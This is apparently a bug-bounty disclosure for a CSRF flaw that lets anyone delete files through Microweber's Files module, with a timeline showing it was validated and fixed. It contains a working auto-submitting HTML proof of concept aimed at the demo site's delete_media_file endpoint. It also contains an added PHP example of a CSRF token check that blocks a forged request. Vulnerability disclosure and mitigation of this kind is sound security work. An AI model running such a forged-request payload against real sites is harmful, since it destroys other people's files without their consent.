Cross-Site Request Forgery (CSRF) in microweber/microweber

Status: Valid

Reported on: Sep 13th 2021


Description

An attacker is able to delete any file in the Files module (if this module is enabled); there is no CSRF protection on this endpoint.

Proof of Concept

After opening the PoC.html file you can see that the file named 1.jpg will be deleted. PoC.html:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.microweber.org/demo/api/media/delete_media_file">
      <input type="hidden" name="path&#91;&#93;" value="&#47;home&#47;demomicr&#47;public&#95;html&#47;demo&#47;userfiles&#47;media&#47;default&#47;1&#46;jpg" />
      <input type="hidden" name="&#95;method" value="POST" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
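As an added example (not Microweber's own code and not the fix from commit 6fb8d8), the check a delete endpoint like delete_media_file needs before it acts: a synchronizer token bound to the session, compared with hash_equals, on a request whose real verb is POST. The function names, the session key, the form field name and the two constructed requests are assumptions for illustration.

```php
<?php
// Added example, not Microweber code: synchronizer-token CSRF check for a
// state-changing endpoint. Names below are assumptions for illustration.

const CSRF_SESSION_KEY = 'csrf_token';
const CSRF_FORM_FIELD  = '_token';

// Issue one random token per session; rendered into the Files module forms.
function csrf_issue_token(array &$session): string {
    if (empty($session[CSRF_SESSION_KEY])) {
        $session[CSRF_SESSION_KEY] = bin2hex(random_bytes(32));
    }
    return $session[CSRF_SESSION_KEY];
}

// $method must be the real HTTP verb ($_SERVER['REQUEST_METHOD']), never a
// value read from a "_method" form field, so a GET form cannot spoof POST.
function csrf_request_allowed(string $method, array $post, array $session,
                              array $headers, string $siteOrigin): bool {
    if ($method !== 'POST') {
        return false;
    }
    $expected = $session[CSRF_SESSION_KEY] ?? '';
    $given    = $post[CSRF_FORM_FIELD] ?? '';
    // is_string guards against "_token[]=" turning the field into an array.
    if ($expected === '' || !is_string($given) || !hash_equals($expected, $given)) {
        return false;
    }
    // Defence in depth: a cross-site form submission carries the attacker's Origin.
    $origin = $headers['Origin'] ?? null;
    if ($origin !== null && strcasecmp(rtrim($origin, '/'), rtrim($siteOrigin, '/')) !== 0) {
        return false;
    }
    return true;
}

// Hypothetical gated handler; it reports what would be deleted and touches no files.
function delete_media_file(array $request, array $session): array {
    if (!csrf_request_allowed($request['method'], $request['post'], $session,
                              $request['headers'], 'https://demo.microweber.org')) {
        return ['status' => 403, 'error' => 'CSRF token missing or invalid'];
    }
    return ['status' => 200, 'would_delete' => $request['post']['path']];
}

// Constructed requests: a cross-site GET with a "_method" override and no token,
// and a same-origin POST carrying the session token.
$session = [];
$token   = csrf_issue_token($session);
$forged  = ['method' => 'GET', 'headers' => ['Origin' => 'https://attacker.example'],
            'post' => ['path' => ['/userfiles/media/default/1.jpg'], '_method' => 'POST']];
$legit   = ['method' => 'POST', 'headers' => ['Origin' => 'https://demo.microweber.org'],
            'post' => ['path' => ['/userfiles/media/default/1.jpg'], '_token' => $token]];
echo delete_media_file($forged, $session)['status'], PHP_EOL;
echo delete_media_file($legit, $session)['status'], PHP_EOL;
```

The forged request is refused before any path is examined, while the same request with the session token and the real POST verb reaches the deletion logic.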
We have contacted a member of the microweber team and are waiting to hear back 2 years ago
Peter Ivanov validated this vulnerability 2 years ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov marked this as fixed with commit 6fb8d8 2 years ago
Peter Ivanov has been awarded the fix bounty
This vulnerability will not receive a CVE
api_callbacks.php#L160-L168 has been validated
media.php#L11-L20 has been validated
Peter Ivanov, 2 years ago:

Thanks for the report, the issue is fixed now
